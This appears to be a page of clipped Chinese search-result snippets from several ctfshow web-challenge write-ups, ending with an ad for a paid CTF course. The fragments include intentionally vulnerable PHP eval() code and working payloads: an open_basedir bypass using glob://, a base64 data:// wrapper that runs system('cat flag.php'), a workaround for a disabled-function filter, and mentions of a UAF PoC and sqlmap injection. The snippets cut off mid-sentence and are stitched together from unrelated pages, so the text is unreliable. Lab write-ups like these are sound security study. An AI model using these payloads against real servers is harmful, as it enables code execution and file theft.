ctfshow web72(绕过open_basedir) if(isset($_POST['c'])){ $c= $_POST['c']; eval($c); $s = ob_get_contents(); ob_end_clean(); echo preg_replace("/[0-9]|[a-z]/i","?",$s); }else{ highlight_file(__FILE__); } 先“采用手段”得到目录后,利用如下uaf脚本绕过。 <?php...
(4)点击开始攻击,根据返回页面字符长短找到爆破的结果。 web22 考察点:子域名爆破 题目提示爆破子域名“ctf.show”,理论上可以使用Layer子域名爆破工具爆破出来,但查看wp得知有flag的子域名失效,访问该子域名失败,还是直接拿flag吧。 web23 考察点:爆破 题目源码: error_reporting(0);include('flag.php');if(iss...
额,然后到ctfshow交流群中下载72poc.php的一个文件 把文件内容直接粘贴上去,经过url编码就可以得到flag 大佬们太强了orz web 73 先扫一下目录,得到flag文件为flagc.txt文件 继续使用72poc.php中的代码,发现有个strlen被禁用了,考虑将strlen函数重写 但是超内存了,好像还是不行 不过这里可以直接使用include('/flag...
使用了open_basedir进行文件访问限制,可以使用使用glob://伪协议绕过open_basedir,可以参考shu师傅的博客[ctfshow]web入门——命令执行(web72-web77)_命令执行 web72-CSDN博客 c=?><?php $a=new DirectoryIterator("glob:///*"); foreach($a as $f) {echo($f->__toString().' '); } exit(0...
web72~open_basedir 下载附件: <?php error_reporting(0); ini_set('display_errors', 0); // 你们在炫技吗? if(isset($_POST['c'])){ $c=$_POST['c']; eval($c); $s=ob_get_contents(); ob_end_clean(); echopreg_replace("/[0-9]|[a-z]/i","?",$s); }else{ highlight_fil...
ctfshow{22eca81d-7663-4150-bc72-57825852ad03} web33: error_reporting(0);if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c)){eval($c);}}else{highlight_file(__FILE__);} ...
web73 strlen()绕过 没给源码,先利用上一题的payload将flag文件名跑出来为:flagc.txt 使用poc后提示strlen()函数被禁用strlen()函数返回字符串的长度,所以自定义一个返回字符串长度的函数来代替strlen即可 function strlen_admin($s){ $cnt = 0; while(isset($s[$cnt])) { $cnt ++; } return $cnt; }...
见web641,已经找到flag ctfshow{5526710eb3ed7b4742232d6d6f9ee3a9} web647 读取的page.php刚开始看到一个传参点,sqlmap跑一下 image-20230805153432337 存在注入 image-20230805153546825 在ctfshow_secret这个表里得到了一个flag image-20230805153703206 得到了key key_is_here_you_know image-20230805153840718 继续回过...
web79 $file = str_replace("php", "???", $file); include($file); 1. 2. 使用上一题的data伪协议即可,但是需要base64编码后面的字符 data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= 1. web80 $file = str_replace("php", "???", $file); ...
167.CTFshow私教课程-web安全ctfshow私教-PWN分享学习 第3课 pWN入门靶场0-17 第4课 pwn入门靶场18-26 第八节 pwn入门靶场 第一课 计算机基础 第十一节 pwn入门靶场 第二课 ELF文件基础 第七节 pwn入门靶场 第五节 Pwn入门靶场37-59 第六节 PWN入门靶场60-72 拼课》》》 wwit1024...